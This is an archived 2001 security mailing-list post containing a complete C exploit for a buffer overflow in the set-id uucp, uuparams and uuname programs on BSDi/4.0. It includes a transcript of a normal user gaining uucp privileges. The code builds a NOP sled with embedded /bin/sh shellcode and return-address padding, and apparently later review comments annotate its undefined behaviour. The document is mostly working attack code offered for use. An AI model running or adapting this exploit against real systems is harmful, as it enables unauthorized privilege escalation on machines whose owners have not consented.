
(BSDi/4.0-specific)uucp family exploit. (uucp/uuparams/uuname)


From: Vade 79 <v9 () fakehalo deadpig org>
Date: 3 Dec 2001 03:34:27 -0000



-- usage start --

bash-2.02$ id                
uid=123(t) gid=100(user) groups=100(user)
bash-2.02$ cc bsdi_uucp.c -o bsdi_uucp
bash-2.02$ ./bsdi_uucp -uuparams
[ (BSDi/4.0)uucp*[]: family buffer overflow, by:
v9 () fakehalo deadpig org. ]
*** [data]: return address: 0x80474, program:
/usr/sbin/uuparams.
$ id
uid=123(t) euid=6(uucp) gid=100(user) egid=6(uucp)
groups=6(uucp), 100(user)
$ 

-- usage end --

-- bsdi_uucp.c start --

/* (BSDi)uucp[] family buffer overflow.  by:
   v9 () fakehalo deadpig org.  this yields
   euid/egid/group=6(uucp) on BSDi/4.0
   systems. (BSDi specific exploit)
*/
/* NOTE(review): this file includes no headers at all -- printf, exit,
   strncasecmp, memcpy, strlen, putenv and execl are all reached through
   implicit declarations (tolerated by compilers of the period, removed
   from the language in C99 and a hard error in C23).  <stdio.h>,
   <stdlib.h>, <string.h>/<strings.h> and <unistd.h> are what it needs. */
#define UUCP "/usr/bin/uucp"           /* program run for -uucp */
#define UUPARAMS "/usr/sbin/uuparams"  /* program run for -uuparams */
#define UUNAME "/usr/bin/uuname"       /* program run for -uuname */
#define FILLER "x"   /* placeholder argument passed ahead of the payload */
/* Machine-code payload that main() places in the EXEC= environment
   variable of the executed program.  Kept as a C string, so it is copied
   with strlen() (no embedded zero before the final byte); the last eight
   bytes spell "/bin/sh" plus the terminator. */
static char exec[]=
 "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46"
 "\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e"
 "\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff"
 "\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62"
 "\x69\x6e\x2f\x73\x68\x00"; /* 46 chars. */
/* Print the command-line synopsis for progname (normally av[0]) on
   stdout and terminate the process with exit status 1.  Never returns. */
void usage(char *progname){
 fprintf(stdout,
  "*** [syntax]: %s <-uucp|-uuparams|-uuname>\n",
  progname);
 exit(1);
}
/* Returns the current stack pointer: the inline asm copies %esp into %eax
   and there is no C return statement, so the value relies on the i386
   convention of returning a long in %eax.  GCC-specific and i386-only;
   a missing return in a non-void function is undefined behaviour as far
   as the C standard is concerned. */
long pointer(void){__asm__("movl %esp,%eax");}
/* Entry point.  Selects the target program from av[1], builds the two
   payload buffers, exports one of them as EXEC= and replaces this process
   with the target via execl().  The usage transcript above shows the
   targets running with euid 6 (uucp), i.e. they are set-id binaries that
   trust their argument and environment lengths -- the defect this file
   demonstrates. */
int main(int ac,char **av){
 unsigned short type=0; /* 1 for -uucp (eip becomes argv[3]), 0 otherwise (eip is argv[2]); see execl() */
 unsigned int i=0;
 long ret;              /* this process's %esp (pointer()) plus sizeof(buf) */
 char eip[1024],buf[4096]; /* NOTE(review): neither array is initialised */
 char *progptr;         /* path of the program to execute (UUCP/UUPARAMS/UUNAME) */
 printf("[ (BSDi/4.0)uucp*[]: family buffer o"
 "verflow, by: v9 () fakehalo deadpig org. ]\n");
 if(ac>1){
  /* Case-insensitive prefix match: only the first 5/9/7 characters of
     av[1] are examined. */
  if(!strncasecmp(av[1],"-uucp",5)){
   progptr=UUCP;
   type=1;
  }
  else if(!strncasecmp(av[1],"-uuparams",9)){
   progptr=UUPARAMS;
   type=0;
  }
  else if(!strncasecmp(av[1],"-uuname",7)){
   progptr=UUNAME;
   type=0;
  }
  else
   usage(av[0]); /* usage() calls exit(1) and does not return */
 }
 else
  usage(av[0]);
 ret=(pointer()+sizeof(buf));
 /* eip: three 0x01 bytes, then ret stored as a long at every fourth
    offset from 3 upward.
    NOTE(review): the last iteration (i==1023) writes a 4-byte long at
    eip[1023..1026], and the eip[i]=0x0 below (i==1027) writes one byte
    further -- both past the end of the 1024-byte array.  Undefined
    behaviour; what those bytes land on depends on the compiler's frame
    layout. */
 eip[0]=0x01;eip[1]=0x01;eip[2]=0x01;
 for(i=3;i<1024;i+=4){*(long *)&eip[i]=ret;}
 /* buf: 0x90 bytes, then the exec payload.  strlen(eip) counts only up
    to the first zero byte, so with a ret such as the 0x80474 shown in the
    transcript (little-endian i386) it is far shorter than 1024 and the
    count below depends on the numeric value of ret. */
 eip[i]=0x0;for(i=0;i<(sizeof(buf)-
 strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
 memcpy(buf+i,exec,strlen(exec));
 /* NOTE(review): memcpy() copies strlen(exec) bytes, i.e. without the
    terminating NUL, and the trailing strlen(eip) bytes of buf are never
    written, so the NUL that ends this environment string comes from
    uninitialised stack (or from the out-of-bounds eip writes above, if
    they happen to land here).  putenv() keeps the pointer to buf rather
    than a copy; that is only acceptable because execl() follows before
    main() returns. */
 memcpy(buf,"EXEC=",5);putenv(buf);
 printf("*** [data]: return address: 0x%lx, p"
 "rogram: %s.\n",ret,progptr);
 /* execl() returns (-1) only on failure.  Argument vectors:
    -uucp:   progptr "x" "x" eip
    others:  progptr "x" eip
    The list is closed with a bare 0 rather than (char *)0; that is only
    correct where int and char * have the same size and representation. */
 if(execl(progptr,progptr,FILLER,
 (type?FILLER:eip),(type?eip:0),0)){
  printf("*** [error]: could not execute %s s"
  "uccessfully.\n",progptr);
  exit(1);
 }
 exit(0);
}

-- bsdi_uucp.c end --

Vade79 -> v9 () fakehalo deadpig org ->
fakehalo.deadpig.org

